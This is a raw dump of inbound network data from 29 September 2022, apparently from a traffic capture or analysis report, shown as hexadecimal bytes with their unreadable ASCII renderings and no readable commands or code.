                                                                                                                                                    2022-09-29 12:59:25 UTC35009INData Raw: 3b ec 70 05 50 8a ae 74 59 02 67 4d 81 bf a8 9e fe 57 21 93 47 c5 89 8e 4a 56 74 c0 98 f5 5b c4 48 9b 78 b7 85 37 7a 54 2b e6 e4 ee 53 0e 11 60 46 f4 fb 96 cf 32 50 21 91 d9 74 e7 b2 5b 9b fa 87 6b 3a 88 6b b9 54 49 3c 96 22 ee 50 fb e9 ba fc 3f f4 41 a6 8d 4b 9f 56 b5 a0 2f 80 b2 87 fe ac 97 31 13 8e 25 40 43 c6 93 3c 58 08 13 22 3a b2 25 d8 ad b9 02 9f a3 71 7f e4 5b a1 a4 da e7 7c 49 a6 13 e9 54 65 5c 37 d8 6b 4c 0b 75 87 2e 21 77 44 57 97 65 58 de 3c d4 b0 5e 29 f5 df 9d c6 64 1b 7e 0d a4 70 26 8a 08 8e 7a 30 d7 ff ca 83 87 6b d2 e7 78 80 29 8d 85 8b 5e 30 2a db 6d 4b 44 d3 1b a4 32 bd e3 44 32 5e 0b 92 e8 3a 02 66 34 58 04 62 09 be 03 bf e3 f8 ef 89 dd 75 e6 79 7e b1 c8 6f 9d 0f 63 2d f3 40 40 dd 9f 79 7d 12 6c 0f fe 4c ca aa b6 ff d8 63 e4 1d 62 63
                                                                                                                                                    Data Ascii: ;pPtYgMW!GJVt[Hx7zT+S`F2P!t[k:kTI<"P?AKV/1%@C<X":%q[|ITe\7kLu.!wDWeX<^)d~p&z0kx)^0*mKD2D2^:f4Xbuy~oc-@@y}lLcbc
                                                                                                                                                    2022-09-29 12:59:25 UTC35025INData Raw: 2c bb 75 92 36 c4 33 f4 9c 84 fb 51 81 3d 3b db 09 ef 90 c6 20 01 78 71 79 d4 1f db 87 00 b1 b0 9b e0 3b 23 3b 86 4a d0 50 15 af 46 fe 43 26 9e 99 aa ac e7 c4 66 2b 0b 86 d1 ad ac ca 73 53 41 de 02 b9 30 24 fc 76 f5 2f 26 af be ce e3 cf 49 a0 03 93 c6 83 2e 81 9b b9 13 4b 23 50 d3 5b 81 d2 e4 6a 2c 4d ac 1a 26 e6 5a 7e ad 28 87 c6 9d 68 90 af d3 62 6f d0 ee d6 79 bc 52 9c 77 9d 39 13 8f ee e2 26 8b 00 6d 33 5f db 37 83 16 1c b8 70 d3 ad 5a c9 0f c7 5d fe db ec b9 ce 6f bb 90 c5 d7 e1 1d 00 af d3 f5 bd 87 3d a7 34 68 6b 94 82 09 91 e0 50 bd 65 6c 33 4c 81 28 32 38 8e 26 ab 09 dd 85 2d d5 74 ba 38 80 e3 76 13 7d 3b d9 f6 0a a0 8d 41 33 88 b4 ae 8b 69 c6 0c 46 17 38 29 12 13 08 aa c1 8a 9b 02 4d 9f cc ba 03 0a 42 34 3e af 7d e8 7a 3e 6e 48 44 b4 20 d0 f6 ea
                                                                                                                                                    Data Ascii: ,u63Q=; xqy;#;JPFC&f+sSA0$v/&I.K#P[j,M&Z~(hboyRw9&m3_7pZ]o=4hkPel3L(28&-t8v};A3iF8)MB4>}z>nHD
                                                                                                                                                    2022-09-29 12:59:25 UTC35035INData Raw: 63 fe c2 de 3f 07 85 a7 10 99 c4 84 69 37 c2 9f 77 cb 7d d1 4c 45 ff 5b 39 c4 c5 12 61 cd ae 9f 3f c7 63 2c 35 35 2d 5c b0 41 3a 22 20 e9 ae 5f f1 bb be b4 c4 78 52 cb 1a d3 0c 86 b6 b0 94 3b 1c 5b 5e 75 bb a5 79 33 f0 bd 78 8d cc 84 67 04 0b 67 2c 52 b8 f0 e9 b5 06 12 fc 76 30 1d 8a 20 ba 37 af 9d 80 28 e8 5d 49 23 a7 ed cb 8e 15 83 01 f4 17 d3 4b d3 4e 78 96 45 94 a8 15 bc 66 84 9e 1f 36 b9 84 1c e5 e3 be 4d 52 eb 52 e0 e1 cd b4 a6 bb f1 8d db 4b a5 9f da 16 1d ac df b5 45 ea 4f 8f db 2f 59 b9 0d 60 08 1e 9b b5 c3 1f e3 07 a3 7b 50 43 af 8d ce 91 ce 6a 41 e3 da 93 d7 fa 2d 97 52 e3 04 78 95 dd 7f 0b 16 c9 75 a6 ae 00 8c 52 29 ef 5e cb 7c 28 42 c9 4e 1a 94 81 60 1b 10 4c 78 3a 5a 50 dd 86 37 32 80 fe e6 a4 d2 f3 57 83 4e a5 7c 26 f6 c0 6b 45 c1 fe 34 7b
                                                                                                                                                    Data Ascii: c?i7w}LE[9a?c,55-\A:" _xR;[^uy3xgg,Rv0 7(]I#KNxEf6MRRKEO/Y`{PCjA-RxuR)^|(BN`Lx:ZP72WN|&kE4{
                                                                                                                                                    2022-09-29 12:59:25 UTC35051INData Raw: 31 b4 71 7e be d2 5a 82 ef f9 04 2b 98 0d b5 da ec 36 0b 2b 50 32 58 74 2a e5 a4 67 b7 4b bb 0a ac 2c 28 2b c3 c6 e2 d1 fe 6c 70 c8 e9 85 bf 9c 57 75 0a 6a db f0 5a 87 e7 20 5b 89 7b fb d5 58 55 2f 29 ec bd 6e b8 dd 7e 35 9e 24 01 22 e1 a1 78 b5 28 96 32 08 ec aa b4 68 a4 cb 58 e4 9b f0 3a 6f 64 38 8c 41 1b 9f 3a e0 3f 3c 87 c2 91 2e ae e1 4a 14 43 26 62 bd cd ce 2e 55 28 c3 2a 3e 4c ee 4e e9 79 da 8e 10 5a 4f 46 72 f7 3f f7 2f 2e 48 fb bc 93 b3 d2 8b e5 48 66 91 c6 42 bc a5 20 bd 3d e7 83 29 32 be 0a b6 25 61 de df 36 37 d3 d2 ff 9e 6a a2 ec 30 02 8e 99 8a 63 c0 20 c0 58 72 54 b4 0b 26 44 ef 88 dc 54 11 ad 68 79 e4 5f 83 9c 5c 49 1f 16 f6 d8 35 20 93 a0 b5 5f 34 31 6e 36 d3 81 a1 40 c1 59 be d1 9a aa 6a 87 79 c7 e0 9f 34 ec d3 e7 6a 41 6c 23 cc 2d 49 85
                                                                                                                                                    Data Ascii: 1q~Z+6+P2Xt*gK,(+lpWujZ [{XU/)n~5$"x(2hX:od8A:?<.JC&b.U(*>LNyZOFr?/.HHfB =)2%a67j0c XrT&DThy_\I5 _41n6@Yjy4jAl#-I
                                                                                                                                                    2022-09-29 12:59:25 UTC35067INData Raw: 7a 9a ba 62 cb 37 61 3e f8 7d 19 d3 90 4d 62 f3 fa 62 b4 fb 1a dd f2 e6 33 d1 15 d8 28 c8 a8 6a 56 b1 d3 d5 24 b9 9d 51 6e ef a5 cc 6e c5 37 a0 dc 52 d5 71 81 cd 91 18 94 8d 5b ad 8c 01 83 34 f1 96 4a 11 3d 49 27 4b 30 5d 74 6f 32 cc 6d 2a 6a d6 0b ff d8 92 f3 92 6e c6 5f aa ed 34 ae 31 6c 25 7f 13 e5 13 14 3e 8d 8a 88 d8 d3 aa 1c 56 02 23 e1 0b 95 33 e6 03 a2 7a 0d 3f d5 05 0c 32 38 e3 99 19 1b 95 5a d6 a6 a7 a4 94 3d 57 3a 93 da 3f 57 42 99 16 0e ab 27 91 e8 a4 42 46 d4 d4 9e a9 3b f3 6c 8e 52 61 0e ed 95 95 18 2f 45 2a 50 a4 23 dd 7d 53 6c 3d e8 87 23 04 1d 73 22 ec 98 31 f5 55 b7 40 89 cb da 09 b0 d6 cd b6 b2 9e c8 69 be c8 7e b4 d4 02 94 46 02 a6 fe 70 b2 a0 50 f4 3d f5 16 81 94 40 cb 73 ee 46 d9 48 7c 89 32 f9 4a d3 67 82 a9 2e 00 45 93 8c 1f f3 9a
                                                                                                                                                    Data Ascii: zb7a>}Mbb3(jV$Qnn7Rq[4J=I'K0]to2m*jn_41l%>V#3z?28Z=W:?WB'BF;lRa/E*P#}Sl=#s"1U@i~FpP=@sFH|2Jg.E
                                                                                                                                                    2022-09-29 12:59:25 UTC35083INData Raw: 79 c7 b7 26 94 9a 10 df 00 84 4e 40 1a 77 15 d1 27 39 d3 01 3b f7 a3 14 ae 74 af 45 45 e1 80 26 01 0a 17 5e ba b4 09 46 d2 93 1e fe bd 39 28 16 b8 be c4 5f 24 80 c1 5a 21 bd 43 ac 2d 7c 61 ac ec b4 6c 0c 05 0c 98 e0 57 5a 97 7d 7f 8a 58 ba 57 df 0f 13 e0 80 a0 fe cc 04 67 d6 93 63 33 18 20 13 32 81 53 07 c8 6a 13 6e fb 8f 45 ca 52 38 bd f7 f9 e3 6e 19 23 2d 47 d5 fa da 64 24 b4 c8 5e 41 99 8c 02 7c 3a 07 29 40 e9 1f 24 e1 2d 39 ec 39 63 49 9a d5 11 0b ca f1 e7 fb 2e ad ec c2 25 c8 9c 64 9f 07 ba 0e 7f 9a 83 c0 a9 58 db 08 59 9b 68 99 e2 ea 08 b0 3d c8 88 97 cc fb 03 87 47 03 5b ea a8 0b 85 9a 40 cf ab 01 70 76 41 cd 67 5b 46 b0 85 c4 8b f5 75 2f 1b 11 e4 92 e5 08 65 45 61 4c 24 7a 7b 47 29 2d 79 8b 26 09 d7 d5 a3 14 e2 df a9 97 60 26 f7 b6 ba af 29 69 d4
                                                                                                                                                    Data Ascii: y&N@w'9;tEE&^F9(_$Z!C-|alWZ}XWgc3 2SjnER8n#-Gd$^A|:)@$-99cI.%dXYh=G[@pvAg[Fu/eEaL$z{G)-y&`&)i
                                                                                                                                                    2022-09-29 12:59:25 UTC35099INData Raw: c6 58 34 a1 55 ba 24 08 06 ea a2 99 ce 1a b0 16 bf a4 b6 63 44 d6 24 64 31 92 6d af a4 62 7b 1e 76 fa 9e 2b 62 cf f3 a6 c0 68 ac 1b c6 26 4a a1 3d 78 8c 46 49 88 52 e3 66 f0 83 4f 8d fd e4 f7 28 4a e7 8b 06 b2 5c 30 7f f6 55 32 7e 36 b0 fc a8 62 bd 5f dd 0e 51 47 2b d7 75 6a 24 06 30 59 32 76 bb c5 4a a4 bf 46 62 03 4d 17 9a 0e 1e 59 8e 9c 1a 8b 1b 47 f0 67 7e 3f e3 6d 7b f1 98 40 cc a2 3d 5b 5f 97 be 58 54 77 14 80 1d 96 43 dd 02 d5 c4 58 fd 57 c2 d5 9e e1 5a 36 ec ac fa 10 56 a1 9e e2 cf 02 97 6a f5 6e 95 68 42 11 ba f6 4f 55 dd 7d 04 21 e1 63 f5 dc b4 20 91 7a 55 01 f6 3a 8e b8 58 6e c0 b9 71 90 8f 80 52 b1 bd 72 ad eb 9f e0 70 59 bf e0 4a c5 e1 5c c6 93 d7 9b 6e 08 ec 98 29 d4 46 2c 66 bd 62 ac 54 c8 a5 9c 5a b9 71 19 80 4f 43 f0 f8 7e d8 03 74 be d2
                                                                                                                                                    Data Ascii: X4U$cD$d1mb{v+bh&J=xFIRfO(J\0U2~6b_QG+uj$0Y2vJFbMYGg~?m{@=[_XTwCXWZ6VjnhBOU}!c zU:XnqRrpYJ\n)F,fbTZqOC~t
                                                                                                                                                    2022-09-29 12:59:25 UTC35115INData Raw: 51 6c c8 d5 89 12 c8 60 0e b3 fc 9b 5a 21 bc 7b 63 53 f7 67 ad 2d 1c ba 3b 05 a0 84 d2 9f 10 04 d6 46 66 02 7a 35 34 c9 91 4e 18 03 f9 6e f3 f6 8e 15 fd 22 aa d7 f2 1e a8 ff 8a 34 50 3c 25 b5 1f 9e f5 67 38 5d 5b 03 ea b0 99 ac 9b ef 48 1f ad d0 5a e6 80 71 01 7d bb 36 c5 d8 34 04 2a 9f 7a c2 db ae a0 5d 73 80 3f d0 48 10 ca 9b ba 28 5e 09 8a 88 00 f3 1f ac 00 e6 55 cb fb f6 45 8c 8f 74 d6 1b 20 03 ad 8c b6 a7 ec c2 9c 21 a9 14 fb 8c 3f 15 62 3a d7 fc 50 db 08 8b 88 03 46 6f 7f 24 f8 6f ad d4 5a 51 6d aa 26 93 9e bd 96 d7 3d 4e fe e5 bc 0d f8 5a 74 df 61 d6 cd 52 73 41 ff 94 e1 01 40 18 0f f0 4a 26 a2 63 1a 6a 2c 11 92 1e 8a df ce 3a fa 50 7e a9 29 2f c0 24 93 6c 7e 62 d8 c1 af 84 53 ca 3d 1d fb 87 72 3f 6f 42 e7 72 e6 b3 76 b0 21 34 1d e0 b6 72 0b c2 13
                                                                                                                                                    Data Ascii: Ql`Z!{cSg-;Ffz54Nn"4P<%g8][HZq}64*z]s?H(^UEt !?b:PFo$oZQm&=NZtaRsA@J&cj,:P~)/$l~bS=r?oBrv!4r
                                                                                                                                                    2022-09-29 12:59:25 UTC35131INData Raw: c7 89 fd aa 66 3a 1e 95 01 7f e0 9e f8 ff 14 3b 8f 26 41 8f 7e a0 2e 78 55 a5 36 8d 75 6d 0a a9 65 45 fd 1e d3 75 7e f8 29 6a 6e f1 86 16 e0 97 05 13 c4 e4 aa 58 86 d9 b7 31 2d bd 60 4a 73 3b ed 2e 11 ae ea eb aa 4a a3 02 1c 89 36 1a 0b 21 59 ca 9f d4 65 1d ac 71 57 f9 3d 55 14 3f 65 87 d8 75 f6 09 5e a8 90 fa bb a9 8e 14 69 18 d0 27 91 f0 19 39 01 7d ce 2b ee ae 42 79 9a ad af a4 5c d2 fd 2d e0 e8 d5 a4 e0 d1 c1 67 de f6 9f 92 54 78 50 95 1f 36 6d 0f 98 7e e4 56 6f b4 97 9d 0d 7e 4a 74 1b 0a 4b d4 98 f8 cb ed 87 bb d0 0f ab dd 1b 27 7b 5e 47 ad 3f 98 b9 7b 55 43 47 65 4a 9e 47 9b 37 a1 4b 62 ff 9f fd 1f 59 e2 24 99 b7 6b 64 b0 fd 72 2e 43 79 7b dd c8 10 dd 0b 13 a2 da b2 9d 3f 6a 1a d8 c9 0b 12 4e a5 79 de ee a1 ac a3 d9 27 c3 de c8 9c 0e 39 38 01 83 85
                                                                                                                                                    Data Ascii: f:;&A~.xU6umeEu~)jnX1-`Js;.J6!YeqW=U?eu^i'9}+By\-gTxP6m~Vo~JtK'{^G?{UCGeJG7KbY$kdr.Cy{?jNy'98
                                                                                                                                                    2022-09-29 12:59:25 UTC35147INData Raw: 87 68 db d8 bc 19 a7 db f1 d2 43 cd f6 fe 88 3b 96 18 d1 d2 b7 2d ca 19 bd 11 37 56 82 ba 22 dd 66 ff 9a 3a 15 15 63 7a a2 08 f5 a3 b8 76 b9 ac ab 4a a5 fe d7 d6 19 fb f6 31 91 78 d7 23 40 6f b4 1d a3 7c d4 42 31 2d b1 32 6a d3 ee 09 f0 8d a2 d7 37 66 f7 89 93 f9 c7 b9 27 2f 11 d1 ff 01 4b 2f f2 a3 21 60 57 39 40 fe 2e ff ae 32 40 89 67 23 70 57 71 9d e9 a5 a3 a0 f0 ab 37 49 bc fc 4a 46 ec 5b 25 c7 22 c2 08 a4 b1 9a 8a d0 a3 0a 2b f6 f1 9a 46 b1 e3 1b 4a f0 de 4d 71 c2 dd 9b 86 bf 88 0c 76 21 b5 ee 45 73 93 f9 de 6c 3f 60 ef 74 bd 14 1d cc 25 a0 93 a1 dc b6 58 18 df 86 49 9d fc dd 40 8a 61 ef c2 aa 46 b0 3e 2a 03 b4 b4 36 dd e1 5c 5e 4c c6 9e 23 ab e0 58 fa a2 e7 99 d4 6a 0f 37 b1 fd fa 65 1e 78 49 ab 28 53 17 4e 87 6b 39 cf 1f 35 10 a1 e3 c8 9f 8a d0 34
                                                                                                                                                    Data Ascii: hC;-7V"f:czvJ1x#@o|B1-2j7f'/K/!`W9@.2@g#pWq7IJF[%"+FJMqv!Esl?`t%XI@aF>*6\^L#Xj7exI(SNk954
                                                                                                                                                    2022-09-29 12:59:25 UTC35163INData Raw: c7 fd b8 77 bd d8 61 08 12 06 0e 6a 78 e7 57 42 47 9f bc 84 8f 42 b1 ba 71 58 d0 c6 d3 4b 4d 36 64 a5 4b d8 17 7b ca 85 75 da a3 3d 61 8f d0 1b 8f a3 77 7b e6 0b d6 fb 7a ba f2 70 21 2d 2d c9 a3 9f b1 ab b8 88 fd ef d4 3f 9d ec fe c5 90 8a a5 b7 d0 93 aa 44 33 bd 1a 2f eb 64 c6 92 67 b1 aa e1 f1 4a 7b a5 a7 96 59 37 27 ee 78 88 02 1b 97 64 28 98 0a 66 6c 6a 47 7f 71 2f 1a 17 c3 0b 1b d1 c1 d9 90 ed 04 79 e6 e2 63 ee 92 b1 11 5f 9b ba 8b b0 b7 e7 59 0e af 07 5a be 14 89 d4 f7 80 4d 0b 84 1b 91 dc 41 e6 7f c7 5d 18 21 21 ec f1 00 48 dc 13 61 3f a1 b7 37 25 10 d8 44 75 a4 e0 af 72 9a 8b 3d 74 2c bd 01 cf 8a 34 06 9c ee 42 ac 98 27 dd 09 eb ce 2a 10 74 6a 01 bb e1 d7 a6 c9 84 d5 8f f1 86 a2 f0 b7 7d 29 32 ad 1c 00 b8 5c 9d fe d3 4b d8 12 bc 1f 11 a6 80 bd 28
                                                                                                                                                    Data Ascii: wajxWBGBqXKM6dK{u=aw{zp!--?D3/dgJ{Y7'xd(fljGq/yc_YZMA]!!Ha?7%Dur=t,4B'*tj})2\K(
                                                                                                                                                    2022-09-29 12:59:25 UTC35179INData Raw: 68 52 24 19 fb 30 26 6c 51 2f de 20 e2 c3 e5 34 3c bd 09 d5 9d 03 9c 48 50 57 48 a9 b4 8b b4 fa 18 87 52 84 da 54 eb ae f2 c1 67 a2 8d 71 ea 5f 1d 54 fa fe 98 2c 61 1f 49 e6 02 ae e0 c4 4c 15 5f e5 a5 bb c3 98 be 02 98 7b 77 32 7f 98 52 e5 c4 1a 95 54 6d fc a2 09 6e 48 47 e9 ea da 4f 51 1d 4c e9 16 b3 6b 3f 08 d9 47 87 67 81 da d2 5f b5 55 62 12 5c 27 22 51 f6 5f e0 de 77 35 47 1b 34 93 6e d0 7f 39 35 f9 d8 3f f7 a1 08 8c f1 8b 21 8b d9 c6 d5 18 57 96 07 87 c0 35 fc 73 55 a8 79 8a 38 11 56 5b b9 a6 64 08 cd c1 31 d2 63 64 56 c0 85 bd 38 1c cb fb 21 2a e1 54 0c 6e 6b a0 f2 b4 59 61 af c0 ce 36 be 8f c2 97 dc 51 76 55 18 c4 f8 2d 8d 70 15 46 63 3a 24 c9 f1 73 c0 8b db f5 9d 00 d8 9f b6 0f f6 34 77 f9 31 d2 18 2f df f3 28 ea 3a 73 33 68 bc 14 83 9f d8 a1 0f
                                                                                                                                                    Data Ascii: hR$0&lQ/ 4<HPWHRTgq_T,aIL_{w2RTmnHGOQLk?Gg_Ub\'"Q_w5G4n95?!W5sUy8V[d1cdV8!*TnkYa6QvU-pFc:$s4w1/(:s3h
                                                                                                                                                    2022-09-29 12:59:25 UTC35195INData Raw: 97 40 21 81 3a c1 ee 39 52 60 46 71 5a 52 62 59 94 37 fd 31 aa 12 f6 07 52 6d 3f e4 8f 5b a6 f6 0f ed e0 e2 64 6f 32 a5 62 7e 28 88 03 0f d7 7e 18 d1 13 c9 ad ce 2e d5 af 7d b6 a8 fa ca ca 9a b6 01 e8 e5 61 28 eb 1d 85 f6 df 8a 2e 13 46 40 9a 8e 93 66 36 23 fb fd d9 12 a8 ac 86 2d 8e 61 4b 61 86 91 c4 68 54 b8 27 55 f8 0f ba 4f ca 8a 5f aa 7a f5 50 a1 2b 31 9b da c4 2b 15 ff 88 9a a6 16 18 f4 da 7a 34 bb 38 2d 0f b9 a0 d3 e6 66 29 6a 1c a7 88 ec 73 1f 7f 94 73 57 de c3 fc dd ae 1d f3 2b 26 28 40 40 df 03 30 33 a1 b8 c4 14 f6 33 f3 f1 2d be 21 49 7f bd c1 af 8d 7a c2 bb 5a a2 52 d3 ae 7f af f4 80 e8 1b 75 6c 92 6d cc 47 e6 41 72 20 2c 79 ae 75 cd 14 cc 7c 35 0b 22 a9 3e ec dc 66 35 93 c9 af 4a 77 48 31 1b 36 79 9f f6 95 93 4e 2f 2e 0d 66 ea 36 d3 f0 55 31
                                                                                                                                                    Data Ascii: @!:9R`FqZRbY71Rm?[do2b~(~.}a(.F@f6#-aKahT'UO_zP+1+z48-f)jssW+&(@@033-!IzZRulmGAr ,yu|5">f5JwH16yN/.f6U1
                                                                                                                                                    2022-09-29 12:59:25 UTC35211INData Raw: 23 25 6e cd ba 29 da 68 89 ec 8a bc b0 58 4e c1 47 bf ed 0b 9f 71 f1 be 92 60 b8 60 58 5b 3c 6f e8 17 53 0c 17 3b e6 00 7d c2 bc 76 47 a1 6f 27 65 38 09 6a 86 cb e6 22 7a 05 7c 6b 19 4c 6e 94 50 cd 11 19 ac 23 9f b9 6e cd 0b d6 c1 d5 45 d8 12 0c 5e df 23 69 33 f8 b5 ed 82 ed 43 7e 61 ea af 8e 87 da c0 37 bb 14 b5 06 8b 7e 07 3a 33 45 0a 7f c0 f2 35 69 ce 8e 37 c0 1a e3 96 33 55 9e 39 c8 80 8a 82 17 fb 02 21 d1 75 66 59 ec 17 eb f6 74 aa 6c 38 6c 43 67 5a 95 19 91 1f 96 37 8b 47 e7 6e 6b 4e 8a 55 f6 1b fd 95 e1 49 89 3a 5c e7 d5 1d 06 46 1f 49 98 dc bd 07 f5 05 28 a8 10 ff cc 9c 53 07 9d 0e 13 c1 c7 60 8b bc 70 e2 35 97 7e fb fc 7f 69 7e 82 f3 e4 08 f3 4f 07 35 72 92 ce f1 34 7c 07 63 93 65 9b 15 4e b5 94 d9 6c 67 99 c4 1e a2 5b 35 1e 6b f8 28 59 2f 18 37
                                                                                                                                                    Data Ascii: #%n)hXNGq``X[<oS;}vGo'e8j"z|kLnP#nE^#i3C~a7~:3E5i73U9!ufYtl8lCgZ7GnkNUI:\FI(S`p5~i~O5r4|ceNlg[5k(Y/7
                                                                                                                                                    2022-09-29 12:59:25 UTC35227INData Raw: c7 1c 68 08 fc 54 21 00 e2 ae 95 27 66 4c f1 96 c3 1f a8 22 47 62 de 46 ea 9f 1e 7f c3 41 77 9d df fb f8 91 fa f5 f5 c9 f7 19 4b d1 1a 09 6c 5a d5 71 ba c5 2d 54 08 6a f2 2e 84 63 ff bc d6 5d 15 bf b7 96 ef 46 23 0d bc ec fc 68 38 a4 1b 2e 95 e9 47 22 c4 5c 7f bd e6 69 b0 66 b7 35 81 b5 77 de 84 4c 39 e0 1b ae 19 ea 30 c3 10 f1 e8 38 0f 36 ad 7f c2 c9 0c a7 b7 21 42 05 b5 63 c5 b0 6e 41 2e 76 14 fc c6 41 1a b0 05 12 75 cf 16 c1 e8 5a 9f 8a 35 37 d0 f1 03 41 72 3c ab 54 9e de 45 f8 ef 46 77 22 95 71 ee 5b 9f 74 26 75 83 04 b6 10 39 e0 37 71 af 95 04 02 fa 3d 4b 8f ba f5 c2 c2 9f 39 0b 6e f3 37 3a cf 93 25 fb 0f a3 fb 29 db 57 d7 df b7 59 17 8d c2 ae 74 22 d9 a0 2e e0 82 fd 4b b7 5e 00 df 5f e0 b4 56 87 dd 9d 67 84 48 1e e3 e4 34 bc e6 55 ff c1 6c d9 c5 9a
                                                                                                                                                    Data Ascii: hT!'fL"GbFAwKlZq-Tj.c]F#h8.G"\if5wL9086!BcnA.vAuZ57Ar<TEFw"q[t&u97q=K9n7:%)WYt".K^_VgH4Ul
                                                                                                                                                    2022-09-29 12:59:25 UTC35243INData Raw: 10 e5 c6 37 d3 34 27 aa 51 75 c4 9a 16 dc e3 c7 10 8f be f9 7a f9 ae 93 af 7d d7 c0 aa 8e 32 56 45 ea 54 83 14 e8 ef 4b 2b 79 6c 01 c9 6c ea 99 40 36 40 8a 2e d2 fd 44 b4 66 cc 85 14 86 f7 83 d8 ad ff 5f c7 55 fc 28 2a fe 42 ac b5 82 1c ae d5 5b 34 36 57 1e 35 0d 3a 46 35 44 8a bc 14 c4 41 67 2c 62 dc d1 67 a9 75 21 7a f9 5d 25 5e d4 87 a3 cc 26 19 91 dd 73 37 6e 95 bf 43 fe 51 2f ce a8 e4 28 78 f4 d0 02 44 5c 30 91 4d 6d cd 5f 2d 68 9c 39 ed 7a fc 5a b6 62 a8 81 ee 11 44 e6 55 ab 8a 4e cc a8 0e 1c 2e 75 eb 62 29 89 85 ac 63 f1 7f 4b 09 66 fd 69 bd ae 9c 4e 70 53 ed a2 d7 bd ea 7a 36 2d 37 31 27 6f 6d 7c d7 39 c3 16 b5 4b 8e 4c 30 ab 39 82 42 41 7f 7c a2 b0 e2 2c 49 4d 06 d2 1f 82 8a f6 4e e4 7b b2 54 67 0a 6a c3 02 ea 33 ac 27 42 5e 87 f9 58 0f 12 18 50
                                                                                                                                                    Data Ascii: 74'Quz}2VETK+yll@6@.Df_U(*B[46W5:F5DAg,bgu!z]%^&s7nCQ/(xD\0Mm_-h9zZbDUN.ub)cKfiNpSz6-71'om|9KL09BA|,IMN{Tgj3'B^XP
                                                                                                                                                    2022-09-29 12:59:25 UTC35259INData Raw: a4 b9 b2 bb 03 ef 6e f0 c9 8d 73 c0 30 62 24 24 1f 73 2c 91 e0 af dd 90 68 83 c8 3e 1d 78 c8 8f 22 23 c1 00 58 4f 96 62 d9 91 81 d5 5a 09 13 2b 21 c5 0e e6 26 af 90 54 81 1a df b2 6d 05 24 cc 9f c4 92 6d 6d 32 63 f5 63 e7 b5 d5 a1 cf 53 f9 d8 4a ff 04 70 e0 a6 89 12 7e 80 43 4e a9 0d c3 87 ad 94 9a 35 46 b2 67 35 7e b7 59 ca 9b aa 3e 52 17 d8 35 c2 09 d2 ea 08 07 ac 05 6f 1c 0e 96 cc d7 d0 0b 32 4f 63 6c 1a ea 42 2e 66 f1 97 a7 9e fb c9 40 e3 b0 91 e2 8c e7 d5 f3 6c 38 22 3a e6 de a8 c2 9f f3 71 63 6e 78 00 70 16 63 cc 7b 42 2e 58 ae 1a 3f 9e 15 63 8a a6 30 dd a6 81 c4 d7 dc 74 93 73 6a a7 ea a5 8c c9 57 d9 a8 2e 16 36 c1 4b af d1 4b e9 8d 83 14 77 85 f8 93 e0 b0 d4 ba 4c b1 85 63 3a 01 aa 51 19 f0 13 9b c4 5c 13 68 9d 5d 61 5c 5c 5d 04 a1 8c 00 7a 0f 55
                                                                                                                                                    Data Ascii: ns0b$$s,h>x"#XObZ+!&Tm$mm2ccSJp~CN5Fg5~Y>R5o2OclB.f@l8":qcnxpc{B.X?c0tsjW.6KKwLc:Q\h]a\\]zU
                                                                                                                                                    2022-09-29 12:59:25 UTC35275INData Raw: a3 2f 3d 1d e5 b9 35 ac 18 a5 75 10 d9 74 53 a3 c2 cc 92 99 0b 59 91 dd 11 ce 70 78 c7 2d c8 c7 2a 04 c6 f5 18 3d 76 02 bc c2 f6 1b 7b 14 1d 65 40 f8 ad 27 8b d6 1f 53 5a 00 19 ed d4 51 f2 62 43 0e 27 cf cd 70 50 1b 53 f2 d3 f8 87 c3 07 ae 65 45 4c 6f 85 79 6a 39 4a 97 7c 21 80 3b 7a 98 5b 7a 47 01 22 16 91 1a 96 c4 65 75 83 83 fc 98 99 b8 02 94 82 b2 25 00 73 7c aa 96 da a7 53 00 1b a5 e0 05 df 78 ae cc 80 3b d3 ad e1 b0 0d 2e 06 50 c0 56 2d 80 b2 45 ec 6e b3 c0 25 a4 c8 f8 c4 5a ee c1 2e 51 ba 34 3d 9e 79 09 2d c2 34 d2 bd 7b 4c f6 03 63 0d 57 ef 2d 47 d4 22 0a fb 9d 9d 2e 22 cf fa cd 74 28 f1 d8 40 c5 2e 9a 55 64 b8 d3 d3 26 26 18 bf c7 9f 77 6f 0d 02 42 ef 93 2d ac c2 d8 39 2b 28 97 78 5c 4d 83 00 fc 63 ed e9 d5 fc 76 25 12 c4 53 d2 76 01 2e 95 a1 9a
                                                                                                                                                    Data Ascii: /=5utSYpx-*=v{e@'SZQbC'pPSeELoyj9J|!;z[zG"eu%s|Sx;.PV-En%Z.Q4=y-4{LcW-G"."t(@.Ud&&woB-9+(x\Mcv%Sv.
                                                                                                                                                    2022-09-29 12:59:25 UTC35291INData Raw: 26 5a e6 d2 a5 b7 d2 27 82 d9 e5 8c 7f dc d2 e3 6f 10 3d 52 55 0e 54 a3 28 78 29 09 2f 6b 15 dc a1 9d 35 07 0a 0b f9 c8 1a 84 ac d1 6d df 77 94 60 2a 9d df f4 14 8e 5b 0e 0f 75 95 06 2c fc a9 cc c9 aa ef 69 36 8c 06 d5 3c 63 94 04 b7 29 80 14 86 30 46 f6 40 f6 fa e7 81 f9 ef 55 d9 22 1e 6f d2 1b 2f a3 31 7e e8 93 22 12 b9 12 77 a2 70 42 1c dc 45 5a 99 85 6c 7f bf e3 43 8e d8 84 a5 39 57 db 63 d6 ab b0 08 f7 d0 2e 86 d2 29 9a 7f 28 f2 c5 f7 cb 0e fc a2 48 1b 6d 83 f4 37 c9 b4 91 f0 4a 86 e9 1c 59 10 15 a6 07 b1 72 d9 f2 b1 ac 2b 25 6a 62 cc f2 10 bd 02 41 64 71 09 13 ad 0e ec e3 5c 1c 25 b2 3d 39 da 7c 17 3e 73 0d da 81 9a 02 2c f0 da 6c d8 74 57 2a f9 55 f8 91 ef 81 e1 97 56 8f d0 d8 cf a6 5e df 0f 56 39 ec 5d 89 31 1a ad b0 b4 e6 69 3e 35 af ce 7e 57 77
                                                                                                                                                    Data Ascii: &Z'o=RUT(x)/k5mw`*[u,i6<c)0F@U"o/1~"wpBEZlC9Wc.)(Hm7JYr+%jbAdq\%=9|>s,ltW*UV^V9]1i>5~Ww
